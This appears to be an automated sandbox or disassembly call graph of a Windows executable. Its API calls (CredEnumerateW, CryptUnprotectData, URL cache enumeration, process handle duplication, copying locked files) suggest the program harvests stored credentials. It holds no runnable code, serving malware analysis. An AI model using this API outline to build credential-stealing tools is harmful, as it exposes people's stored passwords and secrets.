40b2cc 27 API calls 38379->38385 38386 40b2cc 27 API calls 38380->38386 38382 44563c 38382->38367 38388 4087b3 338 API calls 38382->38388 38857 409b98 GetFileAttributesW 38383->38857 38384 40b6ef 253 API calls 38384->38312 38390 4456e2 38385->38390 38391 445c23 38386->38391 38387 445d83 38387->38312 38388->38382 38751 413fa6 _wcsicmp _wcsicmp 38390->38751 38395 409d1f 6 API calls 38391->38395 38393 445e12 38400 445e6b 38393->38400 38407 40b2cc 27 API calls 38393->38407 38398 445c37 38395->38398 38396 445aa1 38399 445b17 38396->38399 38414 445ab2 memset 38396->38414 38427 409d1f 6 API calls 38396->38427 38724 40add4 38396->38724 38729 445389 38396->38729 38738 40ae51 38396->38738 38397 4456eb 38403 4456fd memset memset memset memset 38397->38403 38404 4457ea 38397->38404 38405 445389 259 API calls 38398->38405 38832 40aebe 38399->38832 38859 445093 23 API calls 38400->38859 38752 409c70 wcscpy wcsrchr 38403->38752 38755 413d29 38404->38755 38410 445c47 38405->38410 38411 445e33 38407->38411 38408 445e7e 38413 445f67 38408->38413 38416 40b2cc 27 API calls 38410->38416 38417 409d1f 6 API calls 38411->38417 38422 40b2cc 27 API calls 38413->38422 38418 40b2cc 27 API calls 38414->38418 38420 445c53 38416->38420 38421 445e47 38417->38421 38418->38396 38419 409c70 2 API calls 38423 44577e 38419->38423 38424 409d1f 6 API calls 38420->38424 38858 409b98 GetFileAttributesW 38421->38858 38426 445f73 38422->38426 38428 409c70 2 API calls 38423->38428 38429 445c67 38424->38429 38431 409d1f 6 API calls 38426->38431 38427->38396 38432 44578d 38428->38432 38433 445389 259 API calls 38429->38433 38430 445e56 38430->38400 38436 445e83 memset 38430->38436 38434 445f87 38431->38434 38432->38404 38440 40b2cc 27 API calls 38432->38440 38433->38296 38862 409b98 GetFileAttributesW 38434->38862 38439 40b2cc 27 API calls 38436->38439 38438->38312 38438->38384 38441 445eab 38439->38441 38442 4457a8 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 445ebf 38443->38445 38446 4457b8 38444->38446 38447 40ae18 9 API calls 38445->38447 38754 409b98 GetFileAttributesW 38446->38754 38457 445ef5 38447->38457 38449 4457c7 38449->38404 38451 4087b3 338 API calls 38449->38451 38450 40ae51 9 API calls 38450->38457 38451->38404 38452 445f5c 38454 40aebe FindClose 38452->38454 38453 40add4 2 API calls 38453->38457 38454->38413 38455 40b2cc 27 API calls 38455->38457 38456 409d1f 6 API calls 38456->38457 38457->38450 38457->38452 38457->38453 38457->38455 38457->38456 38459 445f3a 38457->38459 38860 409b98 GetFileAttributesW 38457->38860 38861 445093 23 API calls 38459->38861 38461->38255 38462->38261 38463->38255 38464->38253 38466 40c775 38465->38466 38863 40b1ab free free 38466->38863 38468 40c788 38864 40b1ab free free 38468->38864 38470 40c790 38865 40b1ab free free 38470->38865 38472 40c798 38473 40aa04 free 38472->38473 38474 40c7a0 38473->38474 38866 40c274 memset 38474->38866 38479 40a8ab 9 API calls 38480 40c7c3 38479->38480 38481 40a8ab 9 API calls 38480->38481 38482 40c7d0 38481->38482 38895 40c3c3 38482->38895 38486 40c877 38495 40bdb0 38486->38495 38487 40c86c 38937 4053fe 39 API calls 38487->38937 38493 40c7e5 38493->38486 38493->38487 38494 40c634 50 API calls 38493->38494 38920 40a706 38493->38920 38494->38493 39200 404363 38495->39200 38498 40bf5d 39220 40440c 38498->39220 38499 40bdee 38499->38498 38503 40b2cc 27 API calls 38499->38503 38500 40bddf CredEnumerateW 38500->38499 38504 40be02 wcslen 38503->38504 38504->38498 38511 40be1e 38504->38511 38505 40be26 wcsncmp 38505->38511 38508 40be7d memset 38509 40bea7 memcpy 38508->38509 38508->38511 38510 40bf11 wcschr 38509->38510 38509->38511 38510->38511 38511->38498 38511->38505 38511->38508 38511->38509 38511->38510 38512 40b2cc 27 API calls 38511->38512 38514 40bf43 LocalFree 38511->38514 39223 40bd5d 28 API calls 38511->39223 39224 404423 38511->39224 38513 40bef6 _wcsnicmp 38512->38513 38513->38510 38513->38511 38514->38511 38515 4135f7 39239 4135e0 38515->39239 38518 40b2cc 27 API calls 38519 41360d 38518->38519 38520 40a804 8 API calls 38519->38520 38521 413613 38520->38521 38522 41361b 38521->38522 38523 41363e 38521->38523 38524 40b273 27 API calls 38522->38524 38525 4135e0 FreeLibrary 38523->38525 38526 413625 GetProcAddress 38524->38526 38527 413643 38525->38527 38526->38523 38528 413648 38526->38528 38527->38287 38529 413658 38528->38529 38530 4135e0 FreeLibrary 38528->38530 38529->38287 38531 413666 38530->38531 38531->38287 39242 4449b9 38532->39242 38535 444c1f 38535->38268 38536 4449b9 42 API calls 38538 444b4b 38536->38538 38537 444c15 38540 4449b9 42 API calls 38537->38540 38538->38537 39263 444972 GetVersionExW 38538->39263 38540->38535 38541 444b99 memcmp 38546 444b8c 38541->38546 38542 444c0b 39267 444a85 42 API calls 38542->39267 38546->38541 38546->38542 39264 444aa5 42 API calls 38546->39264 39265 40a7a0 GetVersionExW 38546->39265 39266 444a85 42 API calls 38546->39266 38549 40399d 38548->38549 39268 403a16 38549->39268 38551 403a09 39282 40b1ab free free 38551->39282 38553 403a12 wcsrchr 38553->38277 38554 4039a3 38554->38551 38557 4039f4 38554->38557 39279 40a02c CreateFileW 38554->39279 38557->38551 38558 4099c6 2 API calls 38557->38558 38558->38551 38560 414c2e 17 API calls 38559->38560 38561 404048 38560->38561 38562 414c2e 17 API calls 38561->38562 38563 404056 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 404073 38564->38565 38566 409d1f 6 API calls 38565->38566 38567 40408e 38566->38567 38568 409d1f 6 API calls 38567->38568 38569 4040a6 38568->38569 38570 403af5 20 API calls 38569->38570 38571 4040ba 38570->38571 38572 403af5 20 API calls 38571->38572 38573 4040cb 38572->38573 39309 40414f memset 38573->39309 38575 404140 39323 40b1ab free free 38575->39323 38576 4040ec memset 38580 4040e0 38576->38580 38578 404148 38578->38342 38579 4099c6 2 API calls 38579->38580 38580->38575 38580->38576 38580->38579 38581 40a8ab 9 API calls 38580->38581 38581->38580 39336 40a6e6 WideCharToMultiByte 38582->39336 38584 4087ed 39337 4095d9 memset 38584->39337 38587 408809 memset memset memset memset memset 38588 40b2cc 27 API calls 38587->38588 38589 4088a1 38588->38589 38590 409d1f 6 API calls 38589->38590 38591 4088b1 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 4088c0 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 4088d0 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 4088df 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 4088ef 38598->38599 38600 40b2cc 27 API calls 38599->38600 38601 4088fe 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 40890e 38602->38603 38604 40b2cc 27 API calls 38603->38604 38605 40891d 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 40892d 38606->38607 39356 409b98 GetFileAttributesW 38607->39356 38609 40893e 38610 408943 38609->38610 38611 408958 38609->38611 38614 408953 38614->38342 38634 40b633 free 38633->38634 38635 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38634->38635 38636 413f00 Process32NextW 38635->38636 38637 413da5 OpenProcess 38636->38637 38638 413f17 CloseHandle 38636->38638 38639 413eb0 38637->38639 38640 413df3 memset 38637->38640 38638->38379 38639->38636 38642 413ebf free 38639->38642 38643 4099f4 3 API calls 38639->38643 39780 413f27 38640->39780 38642->38639 38643->38639 38644 413e1f 38645 413e37 GetModuleHandleW 38644->38645 39785 413959 38644->39785 39801 413ca4 38644->39801 38645->38644 38647 413e46 GetProcAddress 38645->38647 38647->38644 38649 413ea2 CloseHandle 38649->38639 38651 414c2e 17 API calls 38650->38651 38652 403eb7 38651->38652 38653 414c2e 17 API calls 38652->38653 38654 403ec5 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403ee2 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403efd 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 403f15 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403f29 38661->38662 38663 403af5 20 API calls 38662->38663 38664 403f3a 38663->38664 38665 40414f 33 API calls 38664->38665 38671 403f4f 38665->38671 38666 403faf 39815 40b1ab free free 38666->39815 38668 403f5b memset 38668->38671 38669 403fb7 38669->38315 38670 4099c6 2 API calls 38670->38671 38671->38666 38671->38668 38671->38670 38672 40a8ab 9 API calls 38671->38672 38672->38671 38674 414c2e 17 API calls 38673->38674 38675 403d26 38674->38675 38676 414c2e 17 API calls 38675->38676 38677 403d34 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d51 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403d6c 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403d84 38682->38683 38684 403af5 20 API calls 38683->38684 38685 403d98 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403da9 38686->38687 38688 40414f 33 API calls 38687->38688 38689 403dbe 38688->38689 38690 403e1e 38689->38690 38692 403dca memset 38689->38692 38694 4099c6 2 API calls 38689->38694 38695 40a8ab 9 API calls 38689->38695 39816 40b1ab free free 38690->39816 38692->38689 38693 403e26 38693->38330 38694->38689 38695->38689 38697 414b81 9 API calls 38696->38697 38699 414c40 38697->38699 38698 414c73 memset 38701 414c94 38698->38701 38699->38698 39817 409cea 38699->39817 39820 414592 RegOpenKeyExW 38701->39820 38704 414c64 SHGetSpecialFolderPathW 38706 414d0b 38704->38706 38705 414cc1 38707 414cf4 wcscpy 38705->38707 39821 414bb0 wcscpy 38705->39821 38706->38322 38707->38706 38709 414cd2 39822 4145ac RegQueryValueExW 38709->39822 38711 414ce9 RegCloseKey 38711->38707 38713 409d62 38712->38713 38714 409d43 wcscpy 38712->38714 38713->38353 38715 409719 2 API calls 38714->38715 38716 409d51 wcscat 38715->38716 38716->38713 38718 40aebe FindClose 38717->38718 38719 40ae21 38718->38719 38720 4099c6 2 API calls 38719->38720 38721 40ae35 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 40ae49 38722->38723 38723->38396 38725 40ade0 38724->38725 38728 40ae0f 38724->38728 38726 40ade7 wcscmp 38725->38726 38725->38728 38727 40adfe wcscmp 38726->38727 38726->38728 38727->38728 38728->38396 38730 40ae18 9 API calls 38729->38730 38731 4453c4 38730->38731 38732 40ae51 9 API calls 38731->38732 38733 4453f3 38731->38733 38734 40add4 2 API calls 38731->38734 38737 445403 254 API calls 38731->38737 38732->38731 38735 40aebe FindClose 38733->38735 38734->38731 38736 4453fe 38735->38736 38736->38396 38737->38731 38739 40ae7b FindNextFileW 38738->38739 38740 40ae5c FindFirstFileW 38738->38740 38741 40ae94 38739->38741 38742 40ae8f 38739->38742 38740->38741 38744 40aeb6 38741->38744 38745 409d1f 6 API calls 38741->38745 38743 40aebe FindClose 38742->38743 38743->38741 38744->38396 38745->38744 38746->38307 38747->38286 38748->38382 38749->38363 38750->38363 38751->38397 38753 409c89 38752->38753 38753->38419 38754->38449 38756 413d39 38755->38756 38757 413d2f FreeLibrary 38755->38757 38758 40b633 free 38756->38758 38757->38756 38759 413d42 38758->38759 38760 40b633 free 38759->38760 38761 413d4a 38760->38761 38761->38276 38762->38279 38763->38332 38764->38346 38766 44db70 38765->38766 38767 40b6fc memset 38766->38767 38768 409c70 2 API calls 38767->38768 38769 40b732 wcsrchr 38768->38769 38770 40b743 38769->38770 38771 40b746 memset 38769->38771 38770->38771 38772 40b2cc 27 API calls 38771->38772 38773 40b76f 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 40b783 38774->38775 39823 409b98 GetFileAttributesW 38775->39823 38777 40b792 38778 40b7c2 38777->38778 38779 409c70 2 API calls 38777->38779 39824 40bb98 38778->39824 38781 40b7a5 38779->38781 38783 40b2cc 27 API calls 38781->38783 38787 40b7b2 38783->38787 38784 40b837 CloseHandle 38786 40b83e memset 38784->38786 38785 40b817 38788 409a45 3 API calls 38785->38788 39857 40a6e6 WideCharToMultiByte 38786->39857 38790 409d1f 6 API calls 38787->38790 38791 40b827 CopyFileW 38788->38791 38790->38778 38791->38786 38792 40b866 38793 444432 121 API calls 38792->38793 38794 40b879 38793->38794 38795 40bad5 38794->38795 38796 40b273 27 API calls 38794->38796 38797 40baeb 38795->38797 38798 40bade DeleteFileW 38795->38798 38799 40b89a 38796->38799 38800 40b04b ??3@YAXPAX 38797->38800 38798->38797 38801 438552 134 API calls 38799->38801 38802 40baf3 38800->38802 38803 40b8a4 38801->38803 38802->38356 38804 40bacd 38803->38804 38806 4251c4 137 API calls 38803->38806 38805 443d90 111 API calls 38804->38805 38805->38795 38829 40b8b8 38806->38829 38807 40bac6 39867 424f26 123 API calls 38807->39867 38808 40b8bd memset 39858 425413 17 API calls 38808->39858 38811 425413 17 API calls 38811->38829 38814 40a71b MultiByteToWideChar 38814->38829 38815 40a734 MultiByteToWideChar 38815->38829 38818 40b9b5 memcmp 38818->38829 38819 4099c6 2 API calls 38819->38829 38820 404423 38 API calls 38820->38829 38823 40bb3e memset memcpy 39868 40a734 MultiByteToWideChar 38823->39868 38824 4251c4 137 API calls 38824->38829 38826 40bb88 LocalFree 38826->38829 38829->38807 38829->38808 38829->38811 38829->38814 38829->38815 38829->38818 38829->38819 38829->38820 38829->38823 38829->38824 38830 40ba5f memcmp 38829->38830 39859 4253ef 16 API calls 38829->39859 39860 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38829->39860 39861 4253af 17 API calls 38829->39861 39862 4253cf 17 API calls 38829->39862 39863 447280 memset 38829->39863 39864 447960 memset memcpy memcpy memcpy 38829->39864 39865 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38829->39865 39866 447920 memcpy memcpy memcpy 38829->39866 38830->38829 38831->38358 38833 40aed1 38832->38833 38834 40aec7 FindClose 38832->38834 38833->38290 38834->38833 38836 4099d7 38835->38836 38837 4099da memcpy 38835->38837 38836->38837 38837->38341 38839 40b2cc 27 API calls 38838->38839 38840 44543f 38839->38840 38841 409d1f 6 API calls 38840->38841 38842 44544f 38841->38842 39952 409b98 GetFileAttributesW 38842->39952 38844 44545e 38845 445476 38844->38845 38846 40b6ef 253 API calls 38844->38846 38847 40b2cc 27 API calls 38845->38847 38846->38845 38848 445482 38847->38848 38849 409d1f 6 API calls 38848->38849 38850 445492 38849->38850 39953 409b98 GetFileAttributesW 38850->39953 38852 4454a1 38853 4454b9 38852->38853 38854 40b6ef 253 API calls 38852->38854 38853->38371 38854->38853 38855->38370 38856->38387 38857->38393 38858->38430 38859->38408 38860->38457 38861->38457 38862->38438 38863->38468 38864->38470 38865->38472 38867 414c2e 17 API calls 38866->38867 38868 40c2ae 38867->38868 38938 40c1d3 38868->38938 38873 40c3be 38890 40a8ab 38873->38890 38874 40afcf 2 API calls 38875 40c2fd FindFirstUrlCacheEntryW 38874->38875 38876 40c3b6 38875->38876 38877 40c31e wcschr 38875->38877 38878 40b04b ??3@YAXPAX 38876->38878 38879 40c331 38877->38879 38880 40c35e FindNextUrlCacheEntryW 38877->38880 38878->38873 38882 40a8ab 9 API calls 38879->38882 38880->38877 38881 40c373 GetLastError 38880->38881 38883 40c3ad FindCloseUrlCache 38881->38883 38884 40c37e 38881->38884 38885 40c33e wcschr 38882->38885 38883->38876 38886 40afcf 2 API calls 38884->38886 38885->38880 38887 40c34f 38885->38887 38888 40c391 FindNextUrlCacheEntryW 38886->38888 38889 40a8ab 9 API calls 38887->38889 38888->38877 38888->38883 38889->38880 39127 40a97a 38890->39127 38893 40a8cc 38893->38479 38894 40a8d0 7 API calls 38894->38893 39132 40b1ab free free 38895->39132 38897 40c3dd 38898 40b2cc 27 API calls 38897->38898 38899 40c3e7 38898->38899 39133 414592 RegOpenKeyExW 38899->39133 38901 40c3f4 38902 40c50e 38901->38902 38903 40c3ff 38901->38903 38917 405337 38902->38917 38904 40a9ce 4 API calls 38903->38904 38905 40c418 memset 38904->38905 39134 40aa1d 38905->39134 38908 40c471 38910 40c47a _wcsupr 38908->38910 38909 40c505 RegCloseKey 38909->38902 38911 40a8d0 7 API calls 38910->38911 38912 40c498 38911->38912 38913 40a8d0 7 API calls 38912->38913 38914 40c4ac memset 38913->38914 38915 40aa1d 38914->38915 38916 40c4e4 RegEnumValueW 38915->38916 38916->38909 38916->38910 39136 405220 38917->39136 38921 4099c6 2 API calls 38920->38921 38922 40a714 _wcslwr 38921->38922 38923 40c634 38922->38923 39193 405361 38923->39193 38926 40c65c wcslen 39196 4053b6 39 API calls 38926->39196 38927 40c71d wcslen 38927->38493 38929 40c677 38930 40c713 38929->38930 39197 40538b 39 API calls 38929->39197 39199 4053df 39 API calls 38930->39199 38933 40c6a5 38933->38930 38934 40c6a9 memset 38933->38934 38935 40c6d3 38934->38935 39198 40c589 44 API calls 38935->39198 38937->38486 38939 40ae18 9 API calls 38938->38939 38945 40c210 38939->38945 38940 40ae51 9 API calls 38940->38945 38941 40c264 38942 40aebe FindClose 38941->38942 38944 40c26f 38942->38944 38943 40add4 2 API calls 38943->38945 38950 40e5ed memset memset 38944->38950 38945->38940 38945->38941 38945->38943 38946 40c231 _wcsicmp 38945->38946 38947 40c1d3 35 API calls 38945->38947 38946->38945 38948 40c248 38946->38948 38947->38945 38963 40c084 22 API calls 38948->38963 38951 414c2e 17 API calls 38950->38951 38952 40e63f 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40e658 38953->38954 38964 409b98 GetFileAttributesW 38954->38964 38956 40e667 38957 40e680 38956->38957 38958 409d1f 6 API calls 38956->38958 38965 409b98 GetFileAttributesW 38957->38965 38958->38957 38960 40e68f 38961 40c2d8 38960->38961 38966 40e4b2 38960->38966 38961->38873 38961->38874 38963->38945 38964->38956 38965->38960 38987 40e01e 38966->38987 38968 40e593 38969 40e5b0 38968->38969 38970 40e59c DeleteFileW 38968->38970 38971 40b04b ??3@YAXPAX 38969->38971 38970->38969 38973 40e5bb 38971->38973 38972 40e521 38972->38968 39010 40e175 38972->39010 38975 40e5c4 CloseHandle 38973->38975 38976 40e5cc 38973->38976 38975->38976 38978 40b633 free 38976->38978 38977 40e573 38979 40e584 38977->38979 38980 40e57c CloseHandle 38977->38980 38981 40e5db 38978->38981 39053 40b1ab free free 38979->39053 38980->38979 38984 40b633 free 38981->38984 38983 40e540 38983->38977 39030 40e2ab 38983->39030 38985 40e5e3 38984->38985 38985->38961 39054 406214 38987->39054 38990 40e16b 38990->38972 38993 40afcf 2 API calls 38994 40e08d OpenProcess 38993->38994 38995 40e0a4 GetCurrentProcess DuplicateHandle 38994->38995 38999 40e152 38994->38999 38996 40e0d0 GetFileSize 38995->38996 38997 40e14a CloseHandle 38995->38997 39090 409a45 GetTempPathW 38996->39090 38997->38999 38998 40e160 39002 40b04b ??3@YAXPAX 38998->39002 38999->38998 39001 406214 22 API calls 38999->39001 39001->38998 39002->38990 39003 40e0ea 39093 4096dc CreateFileW 39003->39093 39005 40e0f1 CreateFileMappingW 39006 40e140 CloseHandle CloseHandle 39005->39006 39007 40e10b MapViewOfFile 39005->39007 39006->38997 39008 40e13b CloseHandle 39007->39008 39009 40e11f WriteFile UnmapViewOfFile 39007->39009 39008->39006 39009->39008 39011 40e18c 39010->39011 39094 406b90 39011->39094 39014 40e1a7 memset 39020 40e1e8 39014->39020 39015 40e299 39104 4069a3 39015->39104 39021 40e283 39020->39021 39022 40dd50 _wcsicmp 39020->39022 39028 40e244 _snwprintf 39020->39028 39111 406e8f 13 API calls 39020->39111 39112 40742e 8 API calls 39020->39112 39113 40aae3 wcslen wcslen _memicmp 39020->39113 39114 406b53 SetFilePointerEx ReadFile 39020->39114 39023 40e291 39021->39023 39024 40e288 free 39021->39024 39022->39020 39025 40aa04 free 39023->39025 39024->39023 39025->39015 39029 40a8d0 7 API calls 39028->39029 39029->39020 39031 40e2c2 39030->39031 39032 406b90 11 API calls 39031->39032 39038 40e2d3 39032->39038 39033 40e4a0 39034 4069a3 2 API calls 39033->39034 39036 40e4ab 39034->39036 39036->38983 39038->39033 39039 40e489 39038->39039 39042 40dd50 _wcsicmp 39038->39042 39048 40e3e0 memcpy 39038->39048 39049 40e3fb memcpy 39038->39049 39050 40e3b3 wcschr 39038->39050 39051 40e416 memcpy 39038->39051 39052 40e431 memcpy 39038->39052 39115 406e8f 13 API calls 39038->39115 39116 40dd50 _wcsicmp 39038->39116 39125 40742e 8 API calls 39038->39125 39126 406b53 SetFilePointerEx ReadFile 39038->39126 39040 40aa04 free 39039->39040 39041 40e491 39040->39041 39041->39033 39043 40e497 free 39041->39043 39042->39038 39043->39033 39045 40e376 memset 39117 40aa29 39045->39117 39048->39038 39049->39038 39050->39038 39051->39038 39052->39038 39053->38968 39055 406294 CloseHandle 39054->39055 39056 406224 39055->39056 39057 4096c3 CreateFileW 39056->39057 39058 40622d 39057->39058 39059 406281 GetLastError 39058->39059 39060 40a2ef ReadFile 39058->39060 39064 40625a 39059->39064 39061 406244 39060->39061 39061->39059 39062 40624b 39061->39062 39063 406777 19 API calls 39062->39063 39062->39064 39063->39064 39064->38990 39065 40dd85 memset 39064->39065 39066 409bca GetModuleFileNameW 39065->39066 39067 40ddbe CreateFileW 39066->39067 39070 40ddf1 39067->39070 39068 40afcf ??2@YAPAXI ??3@YAXPAX 39068->39070 39069 41352f 9 API calls 39069->39070 39070->39068 39070->39069 39071 40de0b NtQuerySystemInformation 39070->39071 39072 40de3b CloseHandle GetCurrentProcessId 39070->39072 39071->39070 39073 40de54 39072->39073 39074 413d4c 46 API calls 39073->39074 39082 40de88 39074->39082 39075 40e00c 39076 413d29 free FreeLibrary 39075->39076 39077 40e014 39076->39077 39077->38990 39077->38993 39078 40dea9 _wcsicmp 39079 40dee7 OpenProcess 39078->39079 39080 40debd _wcsicmp 39078->39080 39079->39082 39080->39079 39081 40ded0 _wcsicmp 39080->39081 39081->39079 39081->39082 39082->39075 39082->39078 39083 40dfef CloseHandle 39082->39083 39084 40df78 39082->39084 39085 40df23 GetCurrentProcess DuplicateHandle 39082->39085 39088 40df8f CloseHandle 39082->39088 39083->39082 39084->39083 39084->39088 39089 40dfae _wcsicmp 39084->39089 39085->39082 39086 40df4c memset 39085->39086 39087 41352f 9 API calls 39086->39087 39087->39082 39088->39084 39089->39082 39089->39084 39091 409a74 GetTempFileNameW 39090->39091 39092 409a66 GetWindowsDirectoryW 39090->39092 39091->39003 39092->39091 39093->39005 39095 406bd5 39094->39095 39096 406bad 39094->39096 39098 4066bf free malloc memcpy free free 39095->39098 39103 406c0f 39095->39103 39096->39095 39097 406bba _wcsicmp 39096->39097 39097->39095 39097->39096 39099 406be5 39098->39099 39100 40afcf ??2@YAPAXI ??3@YAXPAX 39099->39100 39099->39103 39101 406bff 39100->39101 39102 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39101->39102 39102->39103 39103->39014 39103->39015 39105 4069c4 ??3@YAXPAX 39104->39105 39106 4069af 39105->39106 39107 40b633 free 39106->39107 39108 4069ba 39107->39108 39109 40b04b ??3@YAXPAX 39108->39109 39110 4069c2 39109->39110 39110->38983 39111->39020 39112->39020 39113->39020 39114->39020 39115->39038 39116->39045 39118 40aa33 39117->39118 39119 40aa63 39117->39119 39120 40aa44 39118->39120 39121 40aa38 wcslen 39118->39121 39119->39038 39122 40a9ce malloc memcpy free free 39120->39122 39121->39120 39123 40aa4d 39122->39123 39123->39119 39124 40aa51 memcpy 39123->39124 39124->39119 39125->39038 39126->39038 39128 40a980 39127->39128 39129 40a8bb 39128->39129 39130 40a995 _wcsicmp 39128->39130 39131 40a99c wcscmp 39128->39131 39129->38893 39129->38894 39130->39128 39131->39128 39132->38897 39133->38901 39135 40aa23 RegEnumValueW 39134->39135 39135->38908 39135->38909 39137 405335 39136->39137 39138 40522a 39136->39138 39137->38493 39139 40b2cc 27 API calls 39138->39139 39140 405234 39139->39140 39141 40a804 8 API calls 39140->39141 39142 40523a 39141->39142 39181 40b273 39142->39181 39144 405248 _mbscpy _mbscat GetProcAddress 39145 40b273 27 API calls 39144->39145 39146 405279 39145->39146 39184 405211 GetProcAddress 39146->39184 39148 405282 39149 40b273 27 API calls 39148->39149 39150 40528f 39149->39150 39185 405211 GetProcAddress 39150->39185 39152 405298 39153 40b273 27 API calls 39152->39153 39154 4052a5 39153->39154 39186 405211 GetProcAddress 39154->39186 39156 4052ae 39157 40b273 27 API calls 39156->39157 39158 4052bb 39157->39158 39187 405211 GetProcAddress 39158->39187 39160 4052c4 39161 40b273 27 API calls 39160->39161 39162 4052d1 39161->39162 39188 405211 GetProcAddress 39162->39188 39164 4052da 39165 40b273 27 API calls 39164->39165 39166 4052e7 39165->39166 39189 405211 GetProcAddress 39166->39189 39168 4052f0 39169 40b273 27 API calls 39168->39169 39170 4052fd 39169->39170 39190 405211 GetProcAddress 39170->39190 39172 405306 39173 40b273 27 API calls 39172->39173 39174 405313 39173->39174 39191 405211 GetProcAddress 39174->39191 39176 40531c 39177 40b273 27 API calls 39176->39177 39178 405329 39177->39178 39192 405211 GetProcAddress 39178->39192 39180 405332 39180->39137 39182 40b58d 27 API calls 39181->39182 39183 40b18c 39182->39183 39183->39144 39184->39148 39185->39152 39186->39156 39187->39160 39188->39164 39189->39168 39190->39172 39191->39176 39192->39180 39194 405220 39 API calls 39193->39194 39195 405369 39194->39195 39195->38926 39195->38927 39196->38929 39197->38933 39198->38930 39199->38927 39201 40440c FreeLibrary 39200->39201 39202 40436d 39201->39202 39203 40a804 8 API calls 39202->39203 39204 404377 39203->39204 39205 404383 39204->39205 39206 404405 39204->39206 39207 40b273 27 API calls 39205->39207 39206->38498 39206->38499 39206->38500 39208 40438d GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043a7 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043ba GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4043ce GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4043e2 GetProcAddress 39215->39216 39217 4043f1 39216->39217 39218 4043f7 39217->39218 39219 40440c FreeLibrary 39217->39219 39218->39206 39219->39206 39221 404413 FreeLibrary 39220->39221 39222 40441e 39220->39222 39221->39222 39222->38515 39223->38511 39225 40447e 39224->39225 39226 40442e 39224->39226 39227 404485 CryptUnprotectData 39225->39227 39228 40449c 39225->39228 39229 40b2cc 27 API calls 39226->39229 39227->39228 39228->38511 39230 404438 39229->39230 39231 40a804 8 API calls 39230->39231 39232 40443e 39231->39232 39233 404445 39232->39233 39234 404467 39232->39234 39235 40b273 27 API calls 39233->39235 39234->39225 39237 404475 FreeLibrary 39234->39237 39236 40444f GetProcAddress 39235->39236 39236->39234 39238 404460 39236->39238 39237->39225 39238->39234 39240 4135f6 39239->39240 39241 4135eb FreeLibrary 39239->39241 39240->38518 39241->39240 39243 4449c4 39242->39243 39244 444a52 39242->39244 39245 40b2cc 27 API calls 39243->39245 39244->38535 39244->38536 39246 4449cb 39245->39246 39247 40a804 8 API calls 39246->39247 39248 4449d1 39247->39248 39249 40b273 27 API calls 39248->39249 39250 4449dc GetProcAddress 39249->39250 39251 40b273 27 API calls 39250->39251 39252 4449f3 GetProcAddress 39251->39252 39253 40b273 27 API calls 39252->39253 39254 444a04 GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 444a15 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 444a26 GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 444a37 GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 444a48 GetProcAddress 39261->39262 39262->39244 39263->38546 39264->38546 39265->38546 39266->38546 39267->38537 39269 403a29 39268->39269 39283 403bed memset memset 39269->39283 39271 403ae7 39296 40b1ab free free 39271->39296 39273 403a3f memset 39277 403a2f 39273->39277 39274 403aef 39274->38554 39275 40a8d0 7 API calls 39275->39277 39276 409d1f 6 API calls 39276->39277 39277->39271 39277->39273 39277->39275 39277->39276 39278 409b98 GetFileAttributesW 39277->39278 39278->39277 39280 40a051 GetFileTime CloseHandle 39279->39280 39281 4039ca CompareFileTime 39279->39281 39280->39281 39281->38554 39282->38553 39284 414c2e 17 API calls 39283->39284 39285 403c38 39284->39285 39286 409719 2 API calls 39285->39286 39287 403c3f wcscat 39286->39287 39288 414c2e 17 API calls 39287->39288 39289 403c61 39288->39289 39290 409719 2 API calls 39289->39290 39291 403c68 wcscat 39290->39291 39297 403af5 39291->39297 39294 403af5 20 API calls 39295 403c95 39294->39295 39295->39277 39296->39274 39298 403b02 39297->39298 39299 40ae18 9 API calls 39298->39299 39307 403b37 39299->39307 39300 403bdb 39301 40aebe FindClose 39300->39301 39303 403be6 39301->39303 39302 40add4 wcscmp wcscmp 39302->39307 39303->39294 39304 40ae18 9 API calls 39304->39307 39305 40ae51 9 API calls 39305->39307 39306 40aebe FindClose 39306->39307 39307->39300 39307->39302 39307->39304 39307->39305 39307->39306 39308 40a8d0 7 API calls 39307->39308 39308->39307 39310 409d1f 6 API calls 39309->39310 39311 404190 39310->39311 39324 409b98 GetFileAttributesW 39311->39324 39313 40419c 39314 4041a7 6 API calls 39313->39314 39315 40435c 39313->39315 39317 40424f 39314->39317 39315->38580 39317->39315 39318 40425e memset 39317->39318 39320 409d1f 6 API calls 39317->39320 39321 40a8ab 9 API calls 39317->39321 39325 414842 39317->39325 39318->39317 39319 404296 wcscpy 39318->39319 39319->39317 39320->39317 39322 4042b6 memset memset _snwprintf wcscpy 39321->39322 39322->39317 39323->38578 39324->39313 39328 41443e 39325->39328 39327 414866 39327->39317 39329 41444b 39328->39329 39330 414451 39329->39330 39331 4144a3 GetPrivateProfileStringW 39329->39331 39332 414491 39330->39332 39333 414455 wcschr 39330->39333 39331->39327 39335 414495 WritePrivateProfileStringW 